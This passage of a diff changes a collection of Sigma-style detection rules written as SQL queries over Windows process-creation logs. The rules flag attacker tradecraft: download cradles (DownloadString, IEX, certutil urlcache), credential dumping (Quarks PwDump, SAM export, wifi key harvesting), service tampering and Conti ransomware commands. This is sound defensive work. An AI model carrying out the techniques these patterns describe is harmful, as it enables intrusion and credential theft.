CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "Computer System Reconnaissance Via Wmic.EXE", - "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", - "status": "experimental", - "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential DLL Injection Or Execution Using Tracker.exe", + "id": "148431ce-4b70-403d-8525-fcc2993f29ea", + "status": "test", + "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmic_recon_computersystem.yml" + "filename": "proc_creation_win_lolbin_tracker.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", 
- "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR 
ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE 
'\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "VsCode Child Process Anomaly", - "id": "5a3164f2-b373-4152-93cf-090b13c12d27", - "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Processes Suspicious Parent Directory", + "id": "96036718-71cc-4027-a538-d1587e0006a7", + "status": "test", + "description": "Detect suspicious parent processes of well-known Windows processes", + "author": "vburov", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1036.003", + "attack.t1036.005" ], "falsepositives": [ - "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. 
Remove or add processes accordingly" + "Some security products seem to spawn these" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\code.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsaiso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\') AND NOT (((ParentProcessName LIKE '%\\\\SavService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\') OR 
(ParentProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (ParentProcessName = '' OR ParentProcessName = '-')))" ], - "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" + "filename": "proc_creation_win_susp_proc_wrong_parent.yml" }, { - "title": "Potential Windows Defender Tampering Via Wmic.EXE", - "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", + "title": "Ilasm Lolbin Use Compile C-Sharp", + "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", "status": "experimental", - "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", + "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" ], - "filename": "proc_creation_win_wmic_namespace_defender.yml" + "filename": "proc_creation_win_lolbin_ilasm.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", - "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active 
directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "status": "test", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND 
CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "Suspicious Scan Loop Network", - "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", + "title": "Suspicious Diantz Alternate Data Stream Execution", + "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", "status": "test", - "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059", - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate script" + "Very Possible" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_susp_network_scan_loop.yml" + "filename": "proc_creation_win_lolbin_diantz_ads.yml" }, { - "title": "New Service Creation Using PowerShell", - "id": "c02e96b7-c63a-4c47-bd83-4a9f74afcfb2", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", "status": "test", - "description": "Detects the creation of a new service using powershell.", - "author": "Timur Zinniatullin, Daniil 
Yugoslavskiy, oscd.community", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.impact", + "attack.s0575", + "attack.t1486" ], "falsepositives": [ - "Legitimate administrator or user creates a service for legitimate reasons.", - "Software installation" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_create_service.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", - "id": "eee00933-a761-4cd0-be70-c42fe91731e7", - "status": "test", - "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", - "author": "Victor Sergeev, oscd.community", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", + "status": "experimental", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE 
'%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", - "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Share And Session Enumeration Using Net.EXE", + "id": "62510e69-616b-4078-b371-847da438cc03", + "status": "stable", + "description": "Detects attempts to enumerate file shares, printer shares and sessions using \"net.exe\" with the \"view\" flag.", + "author": "Endgame, JHasenbusch (ported for oscd.community)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Unknown" + "Legitimate use of net.exe utility by legitimate user" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine 
LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '%view%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_net_share_and_sessions_enum.yml" }, { - "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", - "id": "42b1a5b8-353f-4f10-b256-39de4467faff", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", "status": "test", - "description": "Detect the harvesting of wifi credentials using netsh.exe", - "author": "Andreas Hunkeler (@Karneades), oscd.community", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_netsh_wifi_credential_harvesting.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", - "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Suspicious Invoke-WebRequest Execution", + "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "status": "experimental", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", - "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", - "author": "frack113", + "title": "Suspicious Child Process Created as System", + "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", + "status": "test", + "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", + "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.privilege_escalation", + "attack.t1134.002" ], "falsepositives": [ - "Authorized administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + 
